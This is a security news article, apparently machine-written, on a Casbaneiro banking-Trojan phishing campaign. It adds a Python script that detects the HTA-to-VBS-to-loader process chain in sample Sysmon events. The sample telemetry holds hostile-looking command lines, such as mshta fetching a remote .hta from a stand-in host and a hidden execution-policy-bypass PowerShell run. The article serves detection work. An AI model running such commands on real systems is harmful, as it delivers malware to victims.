Ethical Hacking News
A multi-pronged phishing campaign targeting Spanish-speaking users in organizations across Latin America and Europe has been linked to the Windows banking Trojan Casbaneiro, according to recent research by BlueVoyant. The e-crime group behind it, tracked as Augmented Marauder by BlueVoyant and as Water Saci by Trend Micro, combines WhatsApp automation, ClickFix social engineering, and court summons-themed phishing emails that lure recipients into opening password-protected PDF attachments. The resulting infection chain runs through an interim HTML Application (HTA) and a VBS stage that performs environment and anti-analysis checks before fetching the loaders that launch the Casbaneiro and Horabot malware families.
Casbaneiro, a sophisticated Windows banking Trojan, has been found at the center of a multifaceted phishing campaign targeting Spanish-speaking users in organizations across Latin America and Europe. The activity has been attributed to an e-crime group tracked as Augmented Marauder and Water Saci, which was first documented by Trend Micro in October 2025.
According to security researchers Thomas Elkins and Joshua Green of BlueVoyant, the threat group employs a range of attack mechanisms, including WhatsApp automation, ClickFix social engineering, and email-centric phishing. The campaign begins with phishing emails that use court summons-themed messages to deceive recipients into opening password-protected PDF attachments. The PDFs contain malicious links that trigger automatic downloads of ZIP archives, which in turn lead to the execution of interim HTML Application (HTA) and VBS payloads.
The VBS script carries out environment and anti-analysis checks similar to those found in Horabot artifacts, including a check for Avast antivirus software. It then retrieves next-stage payloads from a remote server, among them AutoIt-based loaders that extract and run encrypted payload files with ".ia" or ".at" extensions. These payloads launch Casbaneiro ("staticdata.dll") and Horabot ("at.dll"): the banking Trojan and the spreader used to propagate it.
Casbaneiro's Delphi DLL module contacts a command-and-control (C2) server to fetch a PowerShell script that spreads the malware by sending phishing emails through Microsoft Outlook to contacts harvested from the victim's mailbox. Horabot is deployed as a secondary payload that targets Yahoo, Live, and Gmail accounts, using them to send further phishing emails via Outlook.
Water Saci has a history of using WhatsApp Web as a distribution vector for banking trojans such as Maverick and Casbaneiro in a worm-like manner. Its recent campaigns instead rely on the ClickFix social engineering tactic to dupe users into running malicious HTA files, with the end goal of deploying Casbaneiro and the Horabot spreader.
The researchers concluded that the group maintains a bifurcated attack infrastructure: WhatsApp-centric Maverick chains on one side and ClickFix and email-based Horabot paths on the other, run concurrently. Together with its dynamic PDF generation and WhatsApp automation, this points to an agile adversary that continually varies its attack paths to bypass modern security controls.
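Both delivery paths described above, the ZIP-borne HTA from the emailed PDF and the ClickFix command pasted into the Run dialog, converge on the same process tree: mshta.exe, then a VBS script host, then an AutoIt loader or PowerShell handling the ".ia"/".at" payload containers. The following Python script is an added example written for this article, not code from BlueVoyant or from the campaign, that runs four detection rules for that tree over Sysmon-style process-creation events. The field names follow Sysmon Event ID 1; every GUID, path, file name and command line in the sample set is constructed for illustration.

```python
"""Detect the HTA -> VBS -> loader execution chain in Sysmon-style events.

Added example for this article. Field names follow Sysmon Event ID 1;
all values in SAMPLE_EVENTS are constructed, not real campaign artifacts.
"""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Process names that typically host the stage that follows the VBS script.
LOADERS = {"autoit3.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe"}
# .hta launched from a user-writable location (extracted ZIP, Temp, AppData).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata)\\", re.I)
# Payload containers with the .ia / .at extensions noted in the report.
STAGE_EXT = re.compile(r"\.(ia|at)(?=[\s\"']|$)", re.I)

SAMPLE_EVENTS = [  # constructed sample telemetry
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    # ClickFix path: the pasted Run-dialog command launches mshta with a URL
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://verify.example.invalid/check.hta"},
    {"ProcessGuid": "g3", "ParentProcessGuid": "g2",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\ana\AppData\Local\Temp\st1.vbs"},
    {"ProcessGuid": "g4", "ParentProcessGuid": "g3",
     "Image": r"C:\Users\ana\AppData\Roaming\Ld\AutoIt3.exe",
     "CommandLine": r"AutoIt3.exe C:\Users\ana\AppData\Roaming\Ld\ld.a3x "
                    r"C:\Users\ana\AppData\Roaming\Ld\staticdata.ia"},
    # Email path: HTA extracted from the downloaded ZIP and double-clicked
    {"ProcessGuid": "g5", "ParentProcessGuid": "g1",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\ana\Downloads\citacion\Citacion_Judicial.hta"'},
    {"ProcessGuid": "g6", "ParentProcessGuid": "g5",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //E:vbscript C:\Users\ana\AppData\Local\Temp\st2.vbs"},
    {"ProcessGuid": "g7", "ParentProcessGuid": "g6",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -f C:\Users\ana\AppData\Local\Temp\h.ps1"},
    # Benign activity that must not fire
    {"ProcessGuid": "g8", "ParentProcessGuid": "g1",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": "OUTLOOK.EXE"},
    {"ProcessGuid": "g9", "ParentProcessGuid": "g1",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs"},
]


def basename(path):
    return ntpath.basename(path).lower()


def ancestry(by_guid, guid):
    """Image basenames from the process itself up to the root (cycle-safe)."""
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(basename(by_guid[guid]["Image"]))
        guid = by_guid[guid]["ParentProcessGuid"]
    return chain


def detect(events):
    """Return (rule_name, ProcessGuid) pairs for every rule that fires."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for ev in events:
        guid, img, cmd = ev["ProcessGuid"], basename(ev["Image"]), ev["CommandLine"]
        parent = by_guid.get(ev["ParentProcessGuid"])
        parent_img = basename(parent["Image"]) if parent else ""
        # Rule 1: mshta fed a remote URL (ClickFix) or an .hta from a user-writable path.
        if img == "mshta.exe" and (re.search(r"https?://", cmd, re.I) or USER_WRITABLE.search(cmd)):
            alerts.append(("mshta_untrusted_source", guid))
        # Rule 2: the HTA host spawning a script host (the interim HTA -> VBS hop).
        if img in SCRIPT_HOSTS and parent_img == "mshta.exe":
            alerts.append(("mshta_spawns_script_host", guid))
        # Rule 3: any process handed a .ia / .at payload container.
        if STAGE_EXT.search(cmd):
            alerts.append(("stage_payload_extension", guid))
        # Rule 4: a loader whose ancestry runs through a script host and then mshta.
        if img in LOADERS:
            chain = ancestry(by_guid, guid)
            hosts = [i for i, name in enumerate(chain) if name in SCRIPT_HOSTS]
            if hosts and "mshta.exe" in chain[hosts[0] + 1:]:
                alerts.append(("hta_vbs_loader_chain", guid))
    return alerts


def flagged_guids(events):
    return {guid for _, guid in detect(events)}


if __name__ == "__main__":
    for rule, guid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} {guid}")
```

Rule 4 keys on the parent chain rather than the loader's file name, so a renamed AutoIt interpreter is still caught once it sits beneath wscript.exe and mshta.exe; rule 3 covers the case where the loader was launched from somewhere the tree does not show. On real telemetry, rule 1 will also fire on some legitimate installers that unpack an .hta into AppData, so tune it with a parent-image allowlist before alerting on it alone.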
Related Information:
https://www.ethicalhackingnews.com/articles/A-Multifaceted-Phishing-Campaign-Casbaneiro-Targets-Latin-America-and-Europe-ehn.shtml
https://thehackernews.com/2026/04/casbaneiro-phishing-targets-latin.html
https://www.bluevoyant.com/blog/augmented-marauders-multi-pronged-casbaneiro-campaigns
https://www.fortinet.com/blog/threat-research/horabot-unleashed-a-stealthy-phishing-threat
https://gurucul.com/latest-threats/horabot-unleashed-a-stealthy-phishing-threat/
https://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain-part2/
https://www.pcrisk.com/removal-guides/16026-casbaneiro-trojan
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://cloud.google.com/security/resources/insights/apt-groups
https://securelist.com/horabot-campaign/119033/
Published: Wed Apr 1 09:17:32 2026 by llama3.2 3B Q4_K_M